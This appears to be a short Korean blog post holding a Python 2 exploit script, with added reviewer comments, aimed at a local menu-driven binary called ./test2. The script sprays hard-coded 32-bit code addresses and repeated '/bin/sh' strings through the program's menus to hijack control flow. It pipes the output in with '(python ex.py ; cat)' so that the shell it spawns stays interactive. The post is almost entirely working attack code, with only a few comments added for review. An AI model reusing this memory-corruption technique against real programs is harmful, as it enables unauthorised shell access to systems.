익스플로잇

python 댓글

wakira 2015. 7. 1. 05:27

ff

test1






import sys


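# Input generator for the local program that the page runs as ./test2.
# Everything is written to stdout, one line per prompt answer.
#
# NOTE(review): the loop-body indentation was lost when this listing was
# pasted, so the file did not parse. It is restored here from the blank-line
# grouping of the original (each `for` owns the run of writes that directly
# follows it) -- confirm against the author's ex.py.
# NOTE(review): the page shows a Python 2.7.5 interpreter. There these str
# literals are byte strings and reach stdout unchanged; a Python 3
# interpreter would treat them as text and encode them on output.

# Two 4-byte values, each repeated 300 times (2400 bytes in total). Read as
# little-endian 32-bit words they are 0x080487c4 and 0x08048630.
# NOTE(review): presumably fixed addresses inside the target -- the target is
# not shown on this page. Hard-coded values like these only stay valid while
# the binary is loaded at a fixed base; a position-independent build with
# address randomisation would invalidate them.
payload = "\xc4\x87\x04\x08" * 300 + "\x30\x86\x04\x08" * 300

# The numeric lines look like menu selections at the target's prompt; what
# each number selects is not visible from this page.

# Three times: selection 1, then the lines "author", "title" and the payload.
for _ in range(3):
    sys.stdout.write("1\n")
    sys.stdout.write("author\n")
    sys.stdout.write("title\n")
    sys.stdout.write(payload + "\n")

sys.stdout.write("2\n")
sys.stdout.write("2\n")

# 0x80 (128) times: selection 3 followed by the text "reply".
for _ in range(0x80):
    sys.stdout.write("3\n")
    sys.stdout.write("reply\n")

sys.stdout.write("1\n")
sys.stdout.write("4\n")

# Twice: selection 1 with ordinary author/title/content text.
for _ in range(2):
    sys.stdout.write("1\n")
    sys.stdout.write("author\n")
    sys.stdout.write("title\n")
    sys.stdout.write("content\n")

sys.stdout.write("2\n")
sys.stdout.write("4\n")

sys.stdout.write("2\n")
sys.stdout.write("author\n")
sys.stdout.write("title\n")

# 0x80 (128) times again, this time with the text "/bin/sh".
for _ in range(0x80):
    sys.stdout.write("3\n")
    sys.stdout.write("/bin/sh\n")

sys.stdout.write("1\n")

sys.stdout.write("4\n")
sys.stdout.write("3\n")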




# Run ex.py and then cat inside one subshell, piping both into ./test2:
# after the script's output ends, cat forwards the terminal's stdin,
# so the pipe into the target stays open.
(python ex.py ; cat) | ./test2






Python 2.7.5+ (default, Sep 19 2013, 13:49:51) 

[GCC 4.8.1] on linux2

Type "help", "copyright", "credits" or "license" for more information.

>>>